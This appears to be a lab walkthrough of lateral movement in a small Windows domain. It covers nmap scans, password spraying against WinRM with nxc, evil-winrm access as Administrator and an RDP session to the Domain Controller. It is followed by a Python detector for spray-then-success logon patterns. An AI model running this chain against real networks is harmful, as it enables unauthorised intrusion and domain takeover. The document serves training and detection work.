After gaining initial access to janed@linux-client, the attacker attempts to move laterally across the network and escalate privileges to gain control over key systems, including the Windows Client and ultimately the Domain Controller.
```
cat /etc/os-release   # Check OS version
hostname              # Identify the machine name
```
On another terminal, scanning the Windows Client (10.0.0.100):
```
nmap -p1-1000 -sV -Pn 10.0.0.100
```
Scanning the Linux Client (10.0.0.101):
```
nmap -Pn -p5985,5986 -sV 10.0.0.101   # Checking for WinRM services
```
Results show WinRM (Windows Remote Management) is filtered.
Since WinRM is present, the attacker attempts password spraying.
- Create `users.txt` and `pass.txt` containing potential credentials:
  ```
  users.txt:
  Administrator

  pass.txt:
  @Deeboodah1!
  password123!
  admin@123
  ```
- Perform password spraying with nxc winrm:
  ```
  nxc winrm 10.0.0.100 -u users.txt -p pass.txt
  ```
  ✅ A working credential is found: Administrator / @Deeboodah1!
- Use Evil-WinRM to access the Windows Client as Administrator:
  ```
  evil-winrm -i 10.0.0.100 -u Administrator -p @Deeboodah1!
  ```
  📌 This grants PowerShell administrator access to the Windows Client.
- Scan the Domain Controller (10.0.0.5) for open services:
  ```
  nmap -Pn 10.0.0.5
  ```
  ✅ Port 3389/tcp (Microsoft Remote Desktop) is open.
- Use xfreerdp to establish an RDP session to the Domain Controller:
  ```
  xfreerdp /v:10.0.0.5 /u:Administrator /p:@Deeboodah1! /d:corp.project-x-dc.com
  ```
  ✅ A new RDP window pops up, providing full control over the Domain Controller!
The attacker successfully:
- Escalated privileges from janed@linux-client to Administrator on Windows Client.
- Laterally moved to the Windows Client using WinRM.
- Compromised the Domain Controller using RDP credentials.
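From the defender's side, this chain leaves a recognisable trail in the Windows Security log: a burst of failed logons (event 4625) from one source, a success (4624) from that same source, and then a remote logon from it to a second host. The following detector is an added example, not part of the original writeup; the event records are constructed sample values (the lab's IPs are reused as placeholders), and the field names and function names are my own, not any SIEM's schema.

```python
from datetime import datetime, timedelta

# Constructed Windows Security log records (not telemetry from the lab): the
# Linux client (10.0.0.101) fails twice against Administrator on the Windows
# client (4625), then succeeds (4624, logon type 3 = network, which WinRM
# uses), then logs on to the DC with logon type 10 (RemoteInteractive = RDP).
SAMPLE_EVENTS = [
    {"t": "2024-03-01T10:00:01", "id": 4625, "host": "10.0.0.100", "user": "Administrator", "src": "10.0.0.101", "type": 3},
    {"t": "2024-03-01T10:00:02", "id": 4625, "host": "10.0.0.100", "user": "Administrator", "src": "10.0.0.101", "type": 3},
    {"t": "2024-03-01T10:00:03", "id": 4624, "host": "10.0.0.100", "user": "Administrator", "src": "10.0.0.101", "type": 3},
    {"t": "2024-03-01T10:02:30", "id": 4624, "host": "10.0.0.5",   "user": "Administrator", "src": "10.0.0.101", "type": 10},
    {"t": "2024-03-01T11:00:00", "id": 4624, "host": "10.0.0.100", "user": "janed",         "src": "10.0.0.50",  "type": 2},
]

def _ts(s):
    return datetime.fromisoformat(s)

def detect_spray_then_success(events, threshold=2, window=timedelta(minutes=5)):
    """Flag each 4624 success preceded, within `window`, by at least `threshold`
    4625 failures from the same source against the same host (the nxc burst).
    Returns (src, host, user, time) tuples."""
    events = sorted(events, key=lambda e: _ts(e["t"]))
    alerts = []
    for i, e in enumerate(events):
        if e["id"] != 4624:
            continue
        cutoff = _ts(e["t"]) - window
        fails = [f for f in events[:i]
                 if f["id"] == 4625 and f["src"] == e["src"]
                 and f["host"] == e["host"] and _ts(f["t"]) >= cutoff]
        if len(fails) >= threshold:
            alerts.append((e["src"], e["host"], e["user"], e["t"]))
    return alerts

def detect_follow_on_remote_logons(events, alerts, window=timedelta(hours=1)):
    """For each flagged source, report later network (type 3, WinRM) or
    RemoteInteractive (type 10, RDP) logons from that source to a different
    host: the hop from the Windows client to the DC in this chain.
    Returns (src, host, logon_type, time) tuples."""
    hops = []
    for src, host, _user, t in alerts:
        for e in events:
            if (e["id"] == 4624 and e["src"] == src and e["host"] != host
                    and e["type"] in (3, 10)
                    and _ts(t) < _ts(e["t"]) <= _ts(t) + window):
                hops.append((src, e["host"], e["type"], e["t"]))
    return hops
```

Tune `threshold` and `window` to the environment's baseline; a single Administrator account logging on to the DC over RDP minutes after a failed-logon burst on a workstation is worth an alert in almost any network.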
🔜 Next Phase: Data Exfiltration & Persistence 📂💀